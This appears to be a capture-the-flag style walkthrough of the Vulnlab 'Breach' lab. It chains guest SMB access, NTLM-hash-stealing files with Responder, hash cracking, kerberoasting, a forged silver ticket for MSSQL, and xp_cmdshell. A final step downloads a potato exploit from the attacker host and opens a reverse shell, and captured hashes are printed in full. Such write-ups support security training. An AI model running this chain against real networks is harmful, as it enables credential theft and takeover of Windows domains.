Breach Vulnlab | Pentest Notes

In this machine, we exploit guest access to upload NTLM stealing files, capturing valid user credentials and obtaining a hash for a user. We validate these credentials to gain access to the target system. During our exploration, we identify a kerberoastable user, allowing us access to MSSQL after creating a silver ticket. We then utilize the Potato exploit to escalate our privileges, ultimately gaining an admin shell.

Scanning

➜  Breach nmap -v 10.10.125.188 -sCV        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:54 EST
Nmap scan report for 10.10.125.188
Host is up (0.25s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 09:55:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-11-03T09:55:29+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-02T09:54:15
| Not valid after:  2025-05-04T09:54:15
| MD5:   779a:2dfc:9c51:9add:a59a:0cd1:6882:4b29
|_SHA-1: b75b:c165:8364:5b4a:d739:cdaa:d9f4:a0c5:3f10:e078
|_ssl-date: 2024-11-03T09:56:08+00:00; 0s from scanner time.
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-03T09:55:30
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
Initiating NSE at 04:56
Completed NSE at 04:56, 0.00s elapsed
Initiating NSE at 04:56
Completed NSE at 04:56, 0.00s elapsed
Initiating NSE at 04:56
Completed NSE at 04:56, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.14 seconds
           Raw packets sent: 1996 (87.800KB) | Rcvd: 39 (3.394KB)
➜  Breach

Enumeration

Using nxc, I first checked for SMB shares with guest access:

➜  Breach nxc smb 10.10.125.188 -u 'guest' -p '' --shares
SMB         10.10.125.188   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:
SMB         10.10.125.188   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.10.125.188   445    BREACHDC         [*] Enumerated shares
SMB         10.10.125.188   445    BREACHDC         Share           Permissions     Remark
SMB         10.10.125.188   445    BREACHDC         -----           -----------     ------
SMB         10.10.125.188   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.10.125.188   445    BREACHDC         C$                              Default share
SMB         10.10.125.188   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.10.125.188   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.10.125.188   445    BREACHDC         share           READ,WRITE      
SMB         10.10.125.188   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.10.125.188   445    BREACHDC         Users           READ            
➜  Breach

Found that shareshare has Both read and write permissions for guest and Users share hash read access granted, potentially useful for exploring user profiles.

I accessed the Users and share share using smbclient:

➜ Breach smbclient \\\\10.10.125.188\\Users -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Feb 17 08:12:16 2022
  ..                                DHS        0  Thu Feb 17 10:38:00 2022
  Default                           DHR        0  Thu Feb 10 04:10:33 2022
  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021
  Public                             DR        0  Tue Sep 14 23:08:59 2021

                7863807 blocks of size 4096. 2594389 blocks available
smb: \> cd Desktop
cd \Desktop\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> ls
  .                                  DR        0  Thu Feb 17 08:12:16 2022
  ..                                DHS        0  Thu Feb 17 10:38:00 2022
  Default                           DHR        0  Thu Feb 10 04:10:33 2022
  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021
  Public                             DR        0  Tue Sep 14 23:08:59 2021

                7863807 blocks of size 4096. 2594381 blocks available
smb: \> cd Default\
lsmb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 04:10:33 2022
  ..                                 DR        0  Thu Feb 17 08:12:16 2022
  AppData                            DH        0  Thu Aug 19 02:45:22 2021
  Desktop                            DR        0  Thu Aug 19 02:24:36 2021
  Documents                          DR        0  Wed Feb  9 19:59:34 2022
  Downloads                          DR        0  Sat May  8 04:20:24 2021
  Favorites                          DR        0  Sat May  8 04:20:24 2021
  Links                              DR        0  Sat May  8 04:20:24 2021
  Music                              DR        0  Sat May  8 04:20:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 10:38:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 02:45:22 2021
  Pictures                           DR        0  Sat May  8 04:20:24 2021
  Saved Games                        Dn        0  Sat May  8 04:20:24 2021
  Videos                             DR        0  Sat May  8 04:20:24 2021

                7863807 blocks of size 4096. 2594368 blocks available
smb: \Default\> cd Desktop\
smb: \Default\Desktop\> ls
  .                                  DR        0  Thu Aug 19 02:24:36 2021
  ..                                DHR        0  Thu Feb 10 04:10:33 2022
  EC2 Feedback.website                A      527  Tue Jun 21 11:36:17 2016
  EC2 Microsoft Windows Guide.website      A      554  Tue Jun 21 11:36:23 2016

                7863807 blocks of size 4096. 2594368 blocks available
smb: \Default\Desktop\> cd /
smb: \> ls
  .                                  DR        0  Thu Feb 17 08:12:16 2022
  ..                                DHS        0  Thu Feb 17 10:38:00 2022
  Default                           DHR        0  Thu Feb 10 04:10:33 2022
  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021
  Public                             DR        0  Tue Sep 14 23:08:59 2021
c
                7863807 blocks of size 4096. 2594367 blocks available
smb: \> cd Public
lsmb: \Public\> ls
  .                                  DR        0  Tue Sep 14 23:08:59 2021
  ..                                 DR        0  Thu Feb 17 08:12:16 2022
  AccountPictures                   DHR        0  Thu Feb 17 08:12:33 2022
  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021
  Documents                          DR        0  Wed Aug 18 19:34:55 2021
  Downloads                          DR        0  Sat May  8 04:20:26 2021
  Libraries                         DHR        0  Sat May  8 04:34:49 2021
  Music                              DR        0  Sat May  8 04:20:26 2021
  Pictures                           DR        0  Sat May  8 04:20:26 2021
  Videos                             DR        0  Sat May  8 04:20:26 2021

                7863807 blocks of size 4096. 2594367 blocks available
smb: \Public\> exit
➜  Breach smbclient  \\\\10.10.91.44\\share -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 17 09:11:08 2022
  ..                                DHS        0  Thu Feb 17 10:38:00 2022
  finance                             D        0  Thu Feb 17 06:19:34 2022
  software                            D        0  Thu Feb 17 06:19:12 2022
  transfer                            D        0  Thu Feb 17 09:00:35 2022

                7863807 blocks of size 4096. 2593844 blocks available
smb: \> cd finance
smb: \finance\> ls
  .                                   D        0  Thu Feb 17 06:19:34 2022
  ..                                  D        0  Thu Feb 17 09:11:08 2022
cd 
                7863807 blocks of size 4096. 2593844 blocks available
smb: \finance\> cd ../software
smb: \software\> ls
  .                                   D        0  Thu Feb 17 06:19:12 2022
  ..                                  D        0  Thu Feb 17 09:11:08 2022

                7863807 blocks of size 4096. 2593844 blocks available
smb: \software\> cd ../transfer
smb: \transfer\> ls
  .                                   D        0  Thu Feb 17 09:00:35 2022
  ..                                  D        0  Thu Feb 17 09:11:08 2022
  claire.pope                         D        0  Thu Feb 17 06:21:35 2022
  diana.pope                          D        0  Thu Feb 17 06:21:19 2022
  julia.wong                          D        0  Thu Feb 17 06:24:39 2022

                7863807 blocks of size 4096. 2593836 blocks available
smb: \transfer\> cd claire.pope\
lsmb: \transfer\claire.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
smb: \transfer\claire.pope\> cd ..
smb: \transfer\> cd diana.pope\
lsmb: \transfer\diana.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
smb: \transfer\diana.pope\> cd ../julia.wong\
smb: \transfer\julia.wong\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\*
smb: \transfer\julia.wong\> cd ..
lsmb: \transfer\> ls
c  .                                   D        0  Thu Feb 17 09:00:35 2022
  ..                                  D        0  Thu Feb 17 09:11:08 2022
  claire.pope                         D        0  Thu Feb 17 06:21:35 2022
  diana.pope                          D        0  Thu Feb 17 06:21:19 2022
  julia.wong                          D        0  Thu Feb 17 06:24:39 2022
d ..

                7863807 blocks of size 4096. 2595871 blocks available
smb: \transfer\> cd ..
smb: \> ls
  .                                   D        0  Thu Feb 17 09:11:08 2022
  ..                                DHS        0  Thu Feb 17 10:38:00 2022
  finance                             D        0  Thu Feb 17 06:19:34 2022
  software                            D        0  Thu Feb 17 06:19:12 2022
  transfer                            D        0  Thu Feb 17 09:00:35 2022

                7863807 blocks of size 4096. 2595867 blocks available
smb: \>

Found nothing useful than 3 usernames:

1
2
3

diana.pope
julia.wong
claire.pope

Since we can upload anything to share share, I used the ntlm_theft.py tool to generate files that would trigger NTLM authentication when accessed. These files would, in turn, cause the target machine to send NTLMv2 hashes to my Responder listener.

```bash
➜ Breach python3 /home/kali/Tools/tools/ActiveDirectory/ntlm_theft/ntlm_theft.py --generate all --server 10.8.3.249 -f breach
Created: breach/breach.scf (BROWSE TO FOLDER)
Created: breach/breach-(url).url (BROWSE TO FOLDER)
Created: breach/breach-(icon).url (BROWSE TO FOLDER)
Created: breach/breach.lnk (BROWSE TO FOLDER)
Created: breach/breach.rtf (OPEN)
Created: breach/breach-(stylesheet).xml (OPEN)
Created: breach/breach-(fulldocx).xml (OPEN)
Created: breach/breach.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: breach/breach-(includepicture).docx (OPEN)
Created: breach/breach-(remotetemplate).docx (OPEN)
Created: breach/breach-(frameset).docx (OPEN)
Created: breach/breach-(externalcell).xlsx (OPEN)
Created: breach/breach.wax (OPEN)
Created: breach/breach.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: breach/breach.asx (OPEN)
Created: breach/breach.jnlp (OPEN)
Created: breach/breach.application (DOWNLOAD AND OPEN)
Created: breach/breach.pdf (OPEN AND ALLOW)
Created: breach/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: breach/Autorun.inf (BROWSE TO FOLDER)
Created: breach/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
➜ Breach

Once the files were generated, I uploaded them to the writable share directory on the Breach machine to prompt NTLM hash theft when accessed by the target:

➜ Breach smbclient \\\\10.10.125.188\\share -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 17 09:11:08 2022
  ..                                DHS        0  Thu Feb 17 10:38:00 2022
  finance                             D        0  Thu Feb 17 06:19:34 2022
  software                            D        0  Thu Feb 17 06:19:12 2022
  transfer                            D        0  Thu Feb 17 09:00:35 2022

                7863807 blocks of size 4096. 2611148 blocks available
smb: \> cd transfer\
smb: \transfer\> ls
  .                                   D        0  Thu Feb 17 09:00:35 2022
  ..                                  D        0  Thu Feb 17 09:11:08 2022
  claire.pope                         D        0  Thu Feb 17 06:21:35 2022
  diana.pope                          D        0  Thu Feb 17 06:21:19 2022
  julia.wong                          D        0  Thu Feb 17 06:24:39 2022

                7863807 blocks of size 4096. 2611148 blocks available
smb: \transfer\> recurse
smb: \transfer\> prompt
smb: \transfer\> mput *
putting file breach-(frameset).docx as \transfer\breach-(frameset).docx (20.0 kb/s) (average 20.0 kb/s)
putting file zoom-attack-instructions.txt as \transfer\zoom-attack-instructions.txt (0.2 kb/s) (average 10.2 kb/s)
putting file breach.rtf as \transfer\breach.rtf (0.2 kb/s) (average 6.9 kb/s)
putting file breach.scf as \transfer\breach.scf (0.2 kb/s) (average 5.1 kb/s)
putting file Autorun.inf as \transfer\Autorun.inf (0.2 kb/s) (average 4.2 kb/s)
putting file breach.htm as \transfer\breach.htm (0.2 kb/s) (average 3.5 kb/s)
putting file breach.m3u as \transfer\breach.m3u (0.1 kb/s) (average 2.9 kb/s)
putting file breach-(externalcell).xlsx as \transfer\breach-(externalcell).xlsx (11.7 kb/s) (average 3.9 kb/s)
putting file breach-(url).url as \transfer\breach-(url).url (0.1 kb/s) (average 3.5 kb/s)
putting file breach-(fulldocx).xml as \transfer\breach-(fulldocx).xml (85.8 kb/s) (average 15.9 kb/s)
putting file breach-(includepicture).docx as \transfer\breach-(includepicture).docx (16.5 kb/s) (average 15.9 kb/s)
putting file breach.lnk as \transfer\breach.lnk (3.9 kb/s) (average 15.0 kb/s)
putting file breach.pdf as \transfer\breach.pdf (0.1 kb/s) (average 5.8 kb/s)
putting file breach.wax as \transfer\breach.wax (0.0 kb/s) (average 4.9 kb/s)
putting file breach-(icon).url as \transfer\breach-(icon).url (0.2 kb/s) (average 4.7 kb/s)
putting file breach.application as \transfer\breach.application (2.8 kb/s) (average 4.7 kb/s)
putting file breach.asx as \transfer\breach.asx (0.2 kb/s) (average 4.6 kb/s)
putting file breach.jnlp as \transfer\breach.jnlp (0.3 kb/s) (average 4.5 kb/s)
putting file breach-(stylesheet).xml as \transfer\breach-(stylesheet).xml (0.2 kb/s) (average 4.3 kb/s)
putting file breach-(remotetemplate).docx as \transfer\breach-(remotetemplate).docx (23.0 kb/s) (average 5.2 kb/s)
putting file desktop.ini as \transfer\desktop.ini (0.1 kb/s) (average 5.0 kb/s)
smb: \transfer\> exit

Uploaded all theft files to share and responder successfully captured an NTLMv2 hash for the user Julia.Wong

➜  Breach sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.3.249]
    Responder IPv6             [fe80::8324:bd2d:eee6:ed4f]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-8AE4H5Y72AG]
    Responder Domain Name      [9R1O.LOCAL]
    Responder DCE-RPC Port     [47249]

[+] Listening for events...                                                                                         

[SMB] NTLMv2-SSP Client   : 10.10.91.44
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:3fb0618fee561123:FFE6A04B30E9304C1331CE2A08F20A1F:0101000000000000809DF4A59F2ADB011BF26CE5D5A300AB00000000020008003900520031004F0001001E00570049004E002D003800410045003400480035005900370052004100470004003400570049004E002D00380041004500340048003500590037003200410047002E003900520131004F002E004C004F00430041004C00030014003900520031004F002E004C004F00430041004C00050014003900520031004F002E004C004F00430041004C0007000800809DF4A59F2ADB01060004000200000002003000300000000000000001000000002000003F5B9BA801E1EEF4176F0E5DEB5A4F4F2414D2BDF7D71400DC0A2B1F004C708C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0033002E003200340039000000000000000000                                                                                           
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong

With the captured hash, I used John the Ripper and the rockyou.txt wordlist to attempt cracking the password for Julia.Wong

➜  Breach john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[....]        (Julia.Wong)     
1g 0:00:00:00 DONE (2024-10-30 07:47) 12.50g/s 1510Kp/s 1510Kc/s 1510KC/s bratz1234..042602
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

After successfully cracking the NTLM hash for Julia.Wong, I proceeded to validate the credentials using nxc

Initial access

1
2
3

➜ Breach nxc smb 10.10.91.44 -u Julia.Wong -p [....]
SMB         10.10.91.44     445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.91.44     445    BREACHDC         [+] breach.vl\Julia.Wong:[...]

Now got a valid credentials in DC. I checked for any kerberoastable users in DC with ADEnum tool

➜  Breach python3 ~/Tools/ADenum/ADenum.py -d breach.vl -u Julia.Wong -p [...] -ip 10.10.91.44 

   █████╗ ██████╗     ███████╗███╗   ██╗██╗   ██╗███╗   ███╗
  ██╔══██╗██╔══██╗    ██╔════╝████╗  ██║██║   ██║████╗ ████║
  ███████║██║  ██║    █████╗  ██╔██╗ ██║██║   ██║██╔████╔██║
  ██╔══██║██║  ██║    ██╔══╝  ██║╚██╗██║██║   ██║██║╚██╔╝██║
  ██║  ██║██████╔╝    ███████╗██║ ╚████║╚██████╔╝██║ ╚═╝ ██║
  ╚═╝  ╚═╝╚═════╝     ╚══════╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝


[*] Domain name:        breach.vl
[*] Username:      Julia.Wong
[*] IP Address:  10.10.91.44
[!] SSL supported:  FALSE
[!] SSL connect:        FALSE

[+] Succesfully Authenticated With LDAP

[-] Authentication mechanism
[+] GSSAPI
[+] GSS-SPNEGO
[+] EXTERNAL
[!] DIGEST-MD5                                           Consider as weak security protocols
[-] LOGIN                                                         Plaintext password
[-] PLAIN                                                         Plaintext password

====================================================
===================== Enum LDAP ====================
====================================================



[-] Users who are Domain Admin
[*] Username: Administrator            CN=Administrator,CN=Users,DC=breach,DC=vl
[*] Username: Julia.Wong               CN=Julia Wong,OU=staff,DC=breach,DC=vl
[*] Username: Christine.Bruce          CN=Christine Bruce,OU=staff,DC=breach,DC=vl

[-] Domain Controllers
[*] Computer: BREACHDC$                CN=BREACHDC,OU=Domain Controllers,DC=breach,DC=vl
        [V] Windows Server 2022 Datacenter 10.0 (20348)

[-] Users with Password Not Expire
[*] Username: Guest                    CN=Guest,CN=Users,DC=breach,DC=vl
[*] Username: Claire.Pope              CN=Claire Pope,OU=staff,DC=breach,DC=vl
[*] Username: Julia.Wong               CN=Julia Wong,OU=staff,DC=breach,DC=vl
[*] Username: Hilary.Reed              CN=Hilary Reed,OU=staff,DC=breach,DC=vl
[*] Username: Diana.Pope               CN=Diana Pope,OU=staff,DC=breach,DC=vl
[*] Username: Jasmine.Price            CN=Jasmine Price,OU=staff,DC=breach,DC=vl
[*] Username: George.Williams          CN=George Williams,OU=staff,DC=breach,DC=vl
[*] Username: Lawrence.Kaur            CN=Lawrence Kaur,OU=staff,DC=breach,DC=vl
[*] Username: Jasmine.Slater           CN=Jasmine Slater,OU=staff,DC=breach,DC=vl
[*] Username: Hugh.Watts               CN=Hugh Watts,OU=staff,DC=breach,DC=vl
[*] Username: Christine.Bruce          CN=Christine Bruce,OU=staff,DC=breach,DC=vl
[*] Username: svc_mssql                CN=svc_mssql,CN=Users,DC=breach,DC=vl

[-] Users with old password
[!] Username: Administrator            Password last change: 985 days ago 2022-02-17 09:33:46
[!] Username: Guest                    Password last change: 985 days ago 2022-02-17 13:36:50
[!] Username: krbtgt                   Password last change: 985 days ago 2022-02-17 10:04:57
[!] Username: Claire.Pope              Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Julia.Wong               Password last change: 985 days ago 2022-02-17 12:58:50
[!] Username: Hilary.Reed              Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Diana.Pope               Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Jasmine.Price            Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: George.Williams          Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Lawrence.Kaur            Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: Jasmine.Slater           Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: Hugh.Watts               Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: Christine.Bruce          Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: svc_mssql                Password last change: 985 days ago 2022-02-17 10:43:08

[-] Users with an interesting description
[!] No entry found !

[-] Users with not the default encryption
[*] Username: krbtgt                   Password is in a reversible encryption or in DES !

[-] Protecting Privileged Domain Accounts
[!] No entry found !

[-] Not Default Attributes (TEST IN BETA)

[!] No entry found !

[-] Laps Password
[!] No entry found !


====================================================
==================== Attack AD =====================
====================================================


[-] AS-REP Roastable Users
[!] No entry found !

[-] Kerberoastable Users
[*] Username: svc_mssql                CN=svc_mssql,CN=Users,DC=breach,DC=vl
[+] Hash added to file:                kerbHash.hash

[-] Starting to crack hashs
[!] No entry found !

➜  Breach

Found that svc_mssql account is Kerberoastable. With the hash we got from ADEnum i used john to crack the hash.

➜  Breach john kerbHash.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[...]         (?)     
1g 0:00:00:00 DONE (2024-10-30 08:05) 33.33g/s 1740Kp/s 1740Kc/s 1740KC/s chloelouise..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
➜  Breach

So with this password and username we can get access to mssql, so i generated a silver ticket using ticketer to make a ticket and access msssql.

➜  Breach ticketer.py -nthash 69596C7AA1E81AEE14F8E78870E21A5C -spn svc_mssql/BREACH.VL -domain BREACH.VL -domain-sid S-1-5-21-2330692793-3312915120-706225856 administrator   
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for BREACH.VL/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache
➜  Breach export KRB5CCNAME=administrator.ccache

After ticket generation i exported it and accessed to mssql using that ticket.

➜  Breach impacket-mssqlclient breach.vl -target-ip 10.10.91.44 -windows-auth -k 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)>

I was able to use enable_xp_cmdshell command inside mssql

After checking privileges i found svc_mssql has SeImpersonatePrivilege, so we can use sigma potato to get a shell as administrator.

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell whoami
output             
----------------   
breach\svc_mssql   

NULL               

SQL (BREACH\Administrator  dbo@master)> 
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell whoami /priv
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               

PRIVILEGES INFORMATION                                                             

----------------------                                                             

NULL                                                                               

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   

SeMachineAccountPrivilege     Add workstations to domain                Disabled   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   

NULL                                                                               

SQL (BREACH\Administrator  dbo@master)>

Privilege Escalation

I uploaded sigma potato and got a reverse shell in my kali.

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell curl http://10.8.3.249:1337/sig.exe.exe -o C:\ProgramData\\sig.exe
output                                                                             
--------------------------------------------------------------------------------   
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current    

                                 Dload  Upload   Total   Spent    Left  Speed      

100 57344  100 57344    0     0  86360      0 --:--:-- --:--:-- --:--:-- 86361   

NULL                                                                               

SQL (BREACH\Administrator  dbo@master)> 
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell C:\ProgramData\sig.exe --revshell 10.8.3.249 443

➜  Breach nc -nvlp 443
Listening on 0.0.0.0 443
Connection received on 10.10.91.44 61353
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>

We successfully obtained a shell with Administrator privileges.